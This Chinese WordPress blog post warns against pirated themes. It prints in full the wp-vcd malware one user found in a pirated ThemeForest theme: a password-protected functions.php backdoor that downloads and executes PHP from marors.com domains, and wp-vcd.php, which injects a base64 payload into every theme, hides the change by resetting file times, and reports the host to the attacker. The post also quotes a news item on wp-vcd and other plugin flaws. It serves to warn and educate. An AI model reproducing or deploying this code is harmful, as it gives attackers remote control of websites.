盜版主題很可怕!

知更鳥
知更鳥
知更鳥
1515
文章
6913
評論
2020年3月19日15:56:46 18 1K

主題森林相信國內 WordPress 用戶都很熟習,來自該網站的收費主題在國內盜版橫行,一些無良者對主題進行所謂優化、漢化后直接出售,更有甚者居然還有冒充國內代理的。主題森林大部分主題并不像國內主題需要加密綁域名或遠程驗證防盜版(因為國外用盜版是犯罪行為根本不需要這個),并且在主題森林購買主題后可以退款,因為主題并沒有任何防范措施,主題森林并不會收回你已獲得的主題包,你可以完全正常使用。什么時候國內能有這種讓我們大中華人民不可理解的商業行為,相信國內會有更多優秀的 WordPress 主題出現。

這里轉篇應該是來自孟加拉的一個WordPress 用戶,下載并使用盜版 WordPress 主題的可怕經歷。

盜版主題很可怕!

盜版主題很可怕!

筆者為了測試兼容性,谷歌上搜索并在一個專門提供盜版主題下載的網站,下載了一款來自Theme Forest(主題森林)的高級收費主題,筆者雖然也感覺有些可疑但并沒多想,直接在本地環境中安裝并啟用。

筆者本身有一定的技術,也怕主題中捆綁惡意代碼,還特意查看一下主題函數模板functions.php中有無可疑代碼,但并未發現可疑的東西,于是勇敢地激活啟用主題,還有些小雞凍!

當完成測試切換到WP默認主題后,Query Monitor 監視器插件發出警告。

盜版主題很可怕!

于是筆者打開當前主題的functions.php發現如下代碼:

展開

<?php
 
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35c977caf96f9197995d4b4d3e14f253')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
    case 'change_domain';
    if (isset($_REQUEST['newdomain'])) {
        if (!empty($_REQUEST['newdomain'])) {
            if ($file = @file_get_contents(__FILE__)) {
                if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                    $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                }
            }
        }
    }
 
    break;
 
case 'change_code';
 
if (isset($_REQUEST['newcode'])) {
    if (!empty($_REQUEST['newcode'])) {
        if ($file = @file_get_contents(__FILE__)) {
            if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']) , $file);
                @file_put_contents(__FILE__, $file);
                print "true";
            }
        }
    }
}
 
break;
 
default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
 
die("");
}
 
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
 
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
 
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
            $handle = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            }
            else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
 
            fclose($handle);
            include $tmpfname;
 
            unlink($tmpfname);
            return get_defined_vars();
        }
 
        $wp_auth_key = '358d76c863c31b2e1a46192808b08590';
        if (($tmpcontent = @file_get_contents("http://www.marors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.marors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        elseif ($tmpcontent = @file_get_contents("http://www.marors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        elseif ($tmpcontent = @file_get_contents("http://www.marors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
 
// $start_wp_theme_tmp
// wp_tmp
// $end_wp_theme_tmp
 
?>

通過這些代碼,攻擊者可以按自己的意愿在主題或服務器中推送任何代碼。筆者慶幸自己沒有在主機環境中安裝這個主題,否則不知道會發生什么!但當前使用的并不是之前下載的那個盜版主題,經查看發現,所有WordPress本地環境中的主題的functions.php文件都被這個代碼感染了,這太可怕了 !

刪除代碼后,Query Monitor 監視器插件仍然報告相同的錯誤,那怎么可能呢 ?再次打開文件,令人驚訝的是代碼又出現了!最終判定在向主題中注入代碼的同時,它肯定還做了一些其他的事情。看來需要檢查WordPress核心文件了,經查創建了兩個新文件并修改了一個核心文件包括文件夾。其中一個文件名稱:wp-vcd.php,代碼如下:

展開

<?php
error_reporting(0);
 
// gICAgICAgICAgICA
 
ini_set('display_errors', 0);
 
// 2V0KCRfUkVRVUVTVFsn
 
$install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nMzU4ZDc2Yzg2M2MzMWIyZTFhNDYxOTI4MDhiMDg1OTAnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cubWFyb3JzLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3Lm1hcm9ycy5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5tYXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cubWFyb3JzLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4=';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
$ping = true;
$ping2 = false;
 
if ($list = scandir($themes)) {
    foreach($list as $_) {
        if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
            $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
            if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
                if (strpos($content, 'WP_V_CD') === false) {
                    $content = $install_code . $content;
                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                    touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
                }
                else {
                    $ping = false;
                }
            }
        }
        else {
            $list2 = scandir($themes . DIRECTORY_SEPARATOR . $_);
            foreach($list2 as $_2) {
                if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
                        if (strpos($content, 'WP_V_CD') === false) {
                            $content = $install_code . $content;
                            @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                            touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $time);
                            $ping2 = true;
                        }
                        else {
 
                            // $ping = false;
 
                        }
                    }
                }
            }
        }
    }
 
    if ($ping) {
        $content = @file_get_contents('http://www.marors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
 
        // @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.marors.com/admin.txt'));
 
    }
 
    if ($ping2) {
        $content = @file_get_contents('http://www.marors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
 
        // @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.marors.com/admin.txt'));
        // echo ABSPATH . 'wp-includes/class.wp.php';
 
    }
}
 
?><?php
error_reporting(0); ?>

最后想說的

請不要在自己的網站上使用任何盜版主題和插件,不要相信這些插件或提供盜版主題的網站,否則將使你的寶貴數據丟失或者被黑客攻擊。

 


 

請不要嘗試將上面的代碼復制到主題中,后果自負。

很多年前,我也喜歡嘗試安裝各種主題和插件,遇到過functions.php文件被感染的情況,也看過其它 WordPress 網站中過此招,這里奉勸大家小心為上!

網上查了一下這個wp-vcd文件:

展開

Sucuri安全小組警告所有WordPress的網站管理員,有必要檢查一下自己的網站中是否存在一款名為“wp-vcd”的惡意軟件。

wp-vcd,一款隱藏在合法WordPress文件中的惡意軟件,用于添加一個隱藏的網站管理員賬戶并授權攻擊者控制受感染的網站。

wp-vcd最初由意大利安全研究員曼Manuel D'Orso在今年夏天發現,wp-vcd的初始版本通過一個名為“wp-vcd.php”文件將惡意代碼注入到WordPress核心文件中,比如functions.php和class.wp.php。

wp-vcd發起的攻擊規模并不算大,但在過去的幾個月里,一直處于活躍狀態。

在上周,Sucuri安全小組發現了wp-vcd的一個新變種,它能夠將惡意代碼注入到以Twenty Fifteen和Twenty Sixteen為主題的WordPress網站中,它們分別是2015年和2016年發布的WordPress CMS的默認主題。雖然有些過時,但仍然在大量WordPress網站中被使用。

Sucuri在上周發布的安全警示中表示:“代碼非常簡單,并沒有通過編碼或混淆函數來隱藏其惡意的意圖。”

攻擊者利用這兩款主題的文件來隱藏wp-vcd的惡意代碼。此代碼會創建一個名為100010010的新管理員賬戶。此后門帳戶的目的是打開與受感染網站的連接,以便攻擊者可以在日后發起跨站腳本攻擊。

根據Sucuri的說法,攻擊者正是利用了過時的插件和主題中存在的漏洞將wp-cvd上傳到了易受攻擊的站點上。如果網站管理員使用了任何基本的Web應用程序防火墻(WAF)來發現并阻止對核心WordPress文件的修改,那么wp-vcd的攻擊是不可能成功的。

更糟糕的是,wp-cvd并不是唯一一個被發現威脅到WordPress網站安全的問題。另外兩個非常受歡迎的WordPress插件——Yoast SEO(超過500萬次安裝)和Formidable Forms(超過20萬次安裝)也被爆出存在安全漏洞。

安全研究員Ryan Dewhurst在Yoast SEO插件中發現了一個跨站點腳本(XSS)漏洞,允許攻擊者在易受攻擊的站點上注入惡意代碼,可被用于釣魚WordPress網站管理員的登錄憑證。

而安全研究員JoukoPynn?nen的發現更是令人后怕,他在Formidable Forms插件中發現了數個安全漏洞,包括SQL注入漏洞、多個跨站點腳本(XSS)漏洞、未經驗證的數據檢索等等,允許攻擊者轉儲易受攻擊站點的數據庫。

來源:https://www.sohu.com/a/205840911_100066938

weinxin
關于本站
分享交流WordPress經驗與技巧,關注前端設計與網站制作。僅用于功能演示。
知更鳥
WordPress 只允許游客瀏覽指定分類的文章 WordPress

WordPress 只允許游客瀏覽指定分類的文章

有童鞋問,如何實現未登錄用戶只能瀏覽指定的分類文章,這里提供一下方法。 只允許游客瀏覽指定分類的文章 網上可以找到類似的代碼: //template_redirect動作鉤子是一定會執行的,所以用這個...
限制 WordPress 部分用戶角色進入后臺 WordPress

限制 WordPress 部分用戶角色進入后臺

有時我們想限制WordPress 部分用戶角色訪問后臺,可以通過下面的代碼實現。 限制 WordPress 部分用戶角色進入后臺 一、只允許管理員、編輯和作者角色訪問后臺 將下面代碼添加到當前主題函數...
匿名

發表評論

匿名網友 填寫信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

評論:18   其中:訪客  18   博主  0
